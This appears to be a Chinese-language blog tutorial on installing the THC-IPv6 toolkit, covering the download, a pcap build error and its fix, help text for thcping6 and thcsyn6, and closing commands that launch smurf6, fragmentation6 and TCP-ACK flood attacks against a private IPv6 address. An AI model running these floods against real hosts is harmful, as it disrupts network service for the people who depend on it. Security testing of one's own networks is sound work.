官网地址
https://www.thc.org/thc-ipv6/
下载
wget https://www.thc.org/releases/thc-ipv6-2.7.tar.gz
安装
[root@20211 mysoft]# tar zxvf thc-ipv6-2.7.tar.gz
[root@20211 mysoft]# cd thc-ipv6-2.7
[root@20211 thc-ipv6-2.7]# make
[root@20211 thc-ipv6-2.7]# make install
install -m0755 -d /usr/local/share/man/man8
install -m0644 -D thc-ipv6.8 /usr/local/share/man/man8
如果在CentOS下安装,提示如下信息,是确实pcap包,运行 “yum install *pcap*”即可
root@202 thc-ipv6-2.7]# make
gcc -O2 -D_HAVE_SSL -c -o thc-ipv6-lib.o thc-ipv6-lib.c
thc-ipv6-lib.c:40:18: 错误:pcap.h:没有那个文件或目录
In file included from thc-ipv6-lib.c:69:
thc-ipv6.h:90: 错误:expected ‘=’, ‘,’, ‘;’, ‘asm’ or ‘__attribute__’ before ‘*’ token
thc-ipv6.h:91: 错误:expected ‘=’, ‘,’, ‘;’, ‘asm’ or ‘__attribute__’ before ‘*’ token
thc-ipv6.h:93: 错误:expected ‘)’ before ‘*’ token
thc-ipv6.h:94: 错误:expected ‘)’ before ‘*’ token
thc-ipv6-lib.c: 在函数‘thc_pcap_function’中:
thc-ipv6-lib.c:110: 错误:‘pcap_t’未声明(在此函数内第一次使用)
thc-ipv6-lib.c:110: 错误:(即使在一个函数内多次出现,每个未声明的标识符在其
thc-ipv6-lib.c:110: 错误:所在的函数内也只报告一次。)
thc-ipv6-lib.c:110: 错误:‘pcap_link’未声明(在此函数内第一次使用)
thc-ipv6-lib.c:111: 错误:‘PCAP_ERRBUF_SIZE’未声明(在此函数内第一次使用)
thc-ipv6-lib.c:112: 错误:‘fcode’的存储大小未知
thc-ipv6-lib.c:130: 错误:‘pcap_handler’未声明(在此函数内第一次使用)
thc-ipv6-lib.c:130: 错误:expected ‘)’ before ‘function’
thc-ipv6-lib.c: 在文件层:
thc-ipv6-lib.c:137: 错误:expected ‘=’, ‘,’, ‘;’, ‘asm’ or ‘__attribute__’ before ‘*’ token
thc-ipv6-lib.c:163: 错误:expected ‘=’, ‘,’, ‘;’, ‘asm’ or ‘__attribute__’ before ‘*’ token
thc-ipv6-lib.c:184: 错误:expected ‘)’ before ‘*’ token
thc-ipv6-lib.c:190: 错误:expected ‘)’ before ‘*’ token
thc-ipv6-lib.c:663: 警告:‘struct pcap_pkthdr’在形参表内部声明
thc-ipv6-lib.c: 在函数‘thc_get_mac_from_sniff’中:
thc-ipv6-lib.c:664: 错误:提领指向不完全类型的指针
thc-ipv6-lib.c: 在函数‘thc_lookup_ipv6_mac’中:
thc-ipv6-lib.c:700: 错误:‘pcap_t’未声明(在此函数内第一次使用)
thc-ipv6-lib.c:700: 错误:‘p’未声明(在此函数内第一次使用)
make: *** [thc-ipv6-lib.o] 错误 1
[root@202 thc-ipv6-2.7]# yum install *pcap*
然后运行make && make install即可
[root@202 thc-ipv6-2.7]# make && make install
[root@20211 thc-ipv6-2.7]# thcping6 ?
thcping6 v2.7 (c) 2014 by van Hauser / THC <[email protected]> www.thc.org
Syntax: thcping6 [-Eafqx] [-e ethertype] [-H t:l:v] [-D t:l:v] [-F dst] [-e ethertype] [-L length] [-N
nextheader] [-V version] [-t ttl] [-c class] [-l label] [-d size] [-S port|-U port|-T type -C code] interface
src6 dst6 [srcmac [dstmac [data]]]
Options:
-T number ICMPv6 type to send (default: 128 = ping)
-C number ICMPv6 code to send (default: 0)
-S port use a TCP SYN packet on the defined port instead of ping
-U port use a UDP packet on the defined port instead of ping
-n count how often to send the packet (default: 1)
-h show more command line options (help!)
You can put an "x" into src6, srcmac and dstmac for an automatic value.
Craft a ICMPv6/TCP/UDP packet with special IPv6 or EH header options.
Returns -1 on error or no reply, 0 on normal reply or 1 on error reply.
[root@20211 thc-ipv6-2.7]#
[root@20211 thc-ipv6-2.7]# thcsyn6 ?
thcsyn6 v2.7 (c) 2014 by van Hauser / THC <[email protected]> www.thc.org
Syntax: thcsyn6 [-AcDrRS] [-m dstmac] [-p port] [-s sourceip6] interface target port
-a add hop-by-hop header with router alert
-d add destination header (can be set up to 150 times)
-A send TCP-ACK packets
-S send TCP-SYN-ACK packets
-r randomize the source from your /64 prefix
-R randomize the source fully
-D randomize the destination (treat as /64)
-m dstmac use this destination mac address
-s sourceip6 use this as source IPv6 address
-p port use fixed source port
Flood the target port with TCP-SYN packets. If you supply "x" as port, it
is randomized.
smurf6 ICMP攻击
[root@20211 /]# smurf6 eth2 fc00:0:0:216::11
Warning: unprefered IPv6 address had to be selected
Starting smurf6 attack against fc00:0:0:216::11 (Press Control-C to end) ...
^C
碎片攻击
[root@dr101 /]# fragmentation6 eth2 fc00:0:0:216::11
ack攻击
[root@dr101 /]# thcsyn6 -Ar eth2 fc00:0:0:216::11 80
命令参考网址